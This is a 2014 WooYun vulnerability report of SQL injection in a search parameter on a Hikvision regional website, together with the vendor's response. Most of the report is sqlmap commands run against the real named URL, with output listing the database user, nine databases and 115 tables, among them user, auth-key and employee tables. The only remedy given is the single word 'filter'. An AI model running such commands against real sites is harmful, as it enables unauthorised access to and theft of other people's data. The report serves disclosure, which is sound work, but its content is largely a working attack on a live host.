漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-050843
漏洞标题:海康威视某站SQL注入一枚泄露大量数据库
相关厂商:海康威视
漏洞作者: 爱上平顶山
提交时间:2014-02-13 15:34
修复时间:2014-02-23 15:35
公开时间:2014-02-23 15:35
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-02-13: 细节已通知厂商并且等待厂商处理中
2014-02-23: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
0.0
详细说明:
海康威视
蛮牛啊 集团包括:www.hikvision.com www.ys7.com www.shipin7.com 厉害
ok 站:http://www.hikvision.su/
点:
http://www.hikvision.su/search.php?search_term=-1
sqlmap -u "http://www.hikvision.su/search.php?search_term=-1" -v 1 --users
[*] 'hikwww'@'localhost'
sqlmap -u "http://www.hikvision.su/search.php?search_term=-1" -v 1 --dbs
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[14:11:45] [INFO] fetching database names
available databases [9]:
[*] china_serials
[*] hikdealers
[*] hikwww
[*] information_schema
[*] logs
[*] magazinvid_hik
[*] servicecenter
[*] support
[*] test
sqlmap -u "http://www.hikvision.su/search.php?search_term=-1" --current-db
web server operating system: Linux Ubuntu
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0
[14:16:44] [INFO] fetching current database
current database: 'hikwww'
sqlmap -u "http://www.hikvision.su/search.php?search_term=-1" --tables -D "hikwww"
Database: hikwww
[115 tables]
+--------------------------+
| Clients_News |
| DLStat |
| access |
| accesslog |
| actions |
| actions_aid |
| advpoll |
| advpoll_choices |
| advpoll_electoral_list |
| aggregator_category |
| aggregator_category_feed |
| aggregator_category_item |
| aggregator_feed |
| aggregator_item |
| authmap |
| batch |
| blocks |
| blocks_roles |
| boxes |
| cache |
| cache_block |
| cache_filter |
| cache_form |
| cache_menu |
| cache_page |
| cache_update |
| cache_views |
| cache_views_data |
| ckeditor_role |
| ckeditor_settings |
| clients_winter12 |
| comments |
| dl_stat |
| eauth |
| eauth_tokens |
| files |
| filter_formats |
| filters |
| flood |
| gmap_taxonomy_node |
| gmap_taxonomy_term |
| hik_adm_perm |
| hik_auth_tokens |
| hik_bugtrack |
| hik_bugtrack_data |
| hik_chat |
| hik_credit |
| hik_dealers_log |
| hik_dealers_news |
| hik_dealers_users |
| hik_dealers_vote_result |
| hik_feedback |
| hik_mail_archive |
| hik_newproducts |
| hik_notify |
| hik_prodinfo |
| hik_reg_q |
| hik_wconf |
| hikvision_authkeys |
| hikvision_devdocs |
| hikvision_devlog |
| hikvision_empl |
| hikvision_users |
| hikvision_warranty |
| history |
| jdata |
| languages |
| locales_source |
| locales_target |
| menu_custom |
| menu_links |
| menu_router |
| mmgr_peoples |
| mmgr_query |
| mmgr_send |
| mmgr_user |
| node |
| node_access |
| node_comment_statistics |
| node_counter |
| node_revisions |
| node_type |
| pdesc |
| permission |
| products |
| role |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sessions |
| sklad |
| system |
| term_data |
| term_hierarchy |
| term_node |
| term_relation |
| term_synonym |
| upload |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_object_cache |
| views_view |
| vocabulary |
| vocabulary_node_types |
| votingapi_cache |
| votingapi_vote |
| warehouse_log |
| warehouse_sn |
| watchdog |
| wysiwyg |
+--------------------------+
ok 无图无真相
就这样吧
漏洞证明:
如上
修复方案:
过滤
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-02-23 15:35
厂商回复:
最新状态:
2014-02-25:非常感谢白帽子@爱上平顶山,漏洞信息我们已收悉,正在修复。本次未及时确认,向白帽子们致歉。今后,我们会提高响应速度,完善应急机制,与白帽子社区建立良好的合作关系。